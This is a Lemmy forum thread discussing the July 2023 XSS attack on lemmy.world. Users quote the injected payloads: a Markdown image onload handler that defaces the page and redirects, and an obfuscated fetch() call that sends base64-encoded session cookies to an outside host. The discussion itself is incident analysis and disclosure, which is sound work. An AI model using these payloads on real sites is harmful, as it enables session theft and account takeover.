396
submitted 1 year ago* (last edited 1 year ago) by AlmightySnoo@sh.itjust.works to c/lemmy@lemmy.ml

DO NOT OPEN THE "LEGAL" PAGE


lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the "Legal" page it shows the HTML unescaped, but fortunately (for now) he's using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
you are viewing a single comment's thread
view the rest of the comments
[-] muddybulldog@mylemmy.win 76 points 1 year ago* (last edited 1 year ago)

Not sure if it's actually XSS. Lemmy.world did have an admin account compromise so it could've been done locally.

It actually looks like it may be being propagated via comments. I received more than a handful from lemmy.world and it appears they were in the process of deleting them before they went dark. I nuked the remaining ones by hand but you can see that lemmy.blahaj.zone still has the same few remaining... https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll

[-] AlmightySnoo@sh.itjust.works 53 points 1 year ago* (last edited 1 year ago)

Wow you're right, so it's not just sidebars, it's the whole Markdown parser:

He encoded the URL in ASCII.

[-] muddybulldog@mylemmy.win 25 points 1 year ago* (last edited 1 year ago)

The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

onload="fetch(String.fromCharCode(104,116,116,112,115, 58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47) +btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))

[-] hawkwind@lemmy.management 20 points 1 year ago
[-] AlmightySnoo@sh.itjust.works 26 points 1 year ago* (last edited 1 year ago)

Yes, so you don't even need to compromise an admin account

[-] TWeaK@lemm.ee 17 points 1 year ago

So maybe the admin account was compromised as a result of the hack, rather than the other way around?

[-] Cyyy@lemmy.ml 14 points 1 year ago

the hacker could use a cookie stealer injected by the xss to steal the admin account.

[-] erre@feddit.win 10 points 1 year ago
[-] hawkwind@lemmy.management 3 points 1 year ago

That makes more sense.

[-] cpp@sh.itjust.works -1 points 1 year ago

This seems like a really basic vulnerability that whoever wrote the code to do that probably should have been aware of. It concerns be about the security of the rest of Lemmy if they're making such basic errors.

[-] sudneo@lemmy.world 39 points 1 year ago

Blaming culture does not help with vulnerability disclosure. Vulnerabilities do happen and will happen again.

Writing a parser is not trivial and remember that it was a tiny project until a month ago.

[-] pfannkuchen_gesicht@lemmy.one 15 points 1 year ago

Trying to blame is indeed of little help here right now. But it also worries me that such a basic vulnerability exists in the first place. It's like the #1 rule to not trust user-input. I hope this is the only such trivial one and we won't wake up to someone exploiting an SQL injection next.

[-] sudneo@lemmy.world 15 points 1 year ago

Honestly it was not trivial, the custom emojis in the markdown parser seems to be vulnerable. Of course everything should be sanitized, but in practice there are cases where it's hard to make a proper sanitization while retaining features to let users write weird stuff. This is not the case of "validate a username" that you know very well which regex to use and which character space.

I would actually say that this vulnerability should have been prevented using proper cookie security, which should make it impossible to steal the session via XSS.

I do acknowledge though that it's not easy to take care of all of this when it's 2 people working on everything (from design to frontend, passing for deployment etc.), especially if there are no specific competencies in appsec.

[-] Squiglet@lemmy.ml 2 points 1 year ago

Stop complaining. Contribute to solution.

[-] OreganoChampion@sh.itjust.works 25 points 1 year ago* (last edited 1 year ago)

I posted this before... But as a Mod for the Mildly Infuriating And Lemmy Shitposting community; 1 hour before the attack happened I received the following message from the admin that was compromised:

A long with that, yeah I saw that message from a member reposting an image with what appeared to code inside it.

I can't get on Lemmy.World to take a screenshot but I wasn't sure what it was I just removed the comment, but it definitely looked like code injection.

[-] urda@mastodon.social 9 points 1 year ago

@muddybulldog @AlmightySnoo It seems odd that like, beehaw, lemmy.world, and blahaj all went down together.

[-] BlackRose@slrpnk.net 19 points 1 year ago

Beehaw did not get hacked, they went offline until it is fixed.

[-] Rentlar@lemmy.ca 11 points 1 year ago

That checks out, beehaw would take an abundance of caution.

[-] muddybulldog@mylemmy.win 9 points 1 year ago

I restored a database snapshot from a couple hours ago. That jives with what I'm seeing.

[-] AlmightySnoo@sh.itjust.works 4 points 1 year ago* (last edited 1 year ago)

what I find curious is how the quotes got in there without being escaped, I kept trying to reproduce that with comment requests and I couldn't

[-] usernotfound@lemmy.ml 3 points 1 year ago

Which table/columns am I looking at here?

this post was submitted on 10 Jul 2023
396 points (99.7% liked)

Lemmy

11948 readers
53 users here now

Everything about Lemmy; bugs, gripes, praises, and advocacy.

For discussion about the lemmy.ml instance, go to !meta@lemmy.ml.

founded 4 years ago
MODERATORS